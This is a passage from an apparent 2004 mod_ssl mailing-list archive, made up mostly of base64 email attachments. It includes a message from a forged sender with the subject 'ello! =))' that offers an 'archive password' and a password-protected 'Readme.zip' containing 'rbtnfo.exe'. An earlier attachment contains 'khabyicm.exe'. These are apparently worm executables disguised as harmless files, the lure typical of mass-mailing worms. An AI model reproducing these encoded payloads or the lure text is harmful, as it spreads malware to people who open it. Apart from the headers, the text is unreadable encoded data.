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

----------jikiumtlnarirylkavop--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar  2 20:16:30 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A28E2A8A89; Tue,  2 Mar 2004 20:16:30 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from JSimon (rrcs-midsouth-24-199-203-29.biz.rr.com [24.199.203.29])
	by master.modssl.org (Postfix) with SMTP id EB7DBA8973
	for ; Tue,  2 Mar 2004 20:16:25 +0100 (CET)
Date: Tue, 02 Mar 2004 11:16:17 -0800
To: modssl-users@modssl.org
Subject: ello! =))
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------hofoqindbppwneerxpbo"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------hofoqindbppwneerxpbo
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

Looking forward for a response  :P
 
88047  -- archive password

----------hofoqindbppwneerxpbo
Content-Type: application/octet-stream; name="Readme.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Readme.zip"

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
